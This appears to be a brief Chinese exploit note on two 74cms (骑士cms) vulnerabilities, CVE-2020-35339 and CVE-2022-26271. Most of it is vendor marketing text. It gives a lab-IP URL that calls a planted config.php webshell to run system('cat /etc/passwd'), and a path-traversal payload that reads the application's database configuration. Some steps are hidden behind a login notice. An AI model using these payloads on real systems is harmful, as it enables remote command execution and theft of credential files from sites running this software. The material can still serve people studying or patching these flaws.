(CVE-2020-35339)(CVE-2022-26271)
骑士cms任意代码执行(CVE-2020-35339)
骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的“平台+插件”体系,打造用户“DIY”个性化功能定制,为众多地方门户、行业人才提供一个专业、稳定、方便的网络招聘管理平台,致力发展成为引领市场风向的优质高效的招聘软件。
登录后台:http://192.168.85.130:64049/index.php?m=Admin&c=index&a=login
您没有 权限 查看此处内容!
访问shell地址:http://192.168.85.130:64049/Application/Home/Conf/config.php
您没有 权限 查看此处内容!
命令执行:http://192.168.85.130:64049/Application/Home/Conf/config.php?1=system(%22cat%20/etc/passwd%22);
74cmsSEv3.4.1存在任意文件读取漏洞(CVE-2022-26271)
payload:http://url/index/download/index?name=index.php&url=../../application/database.php
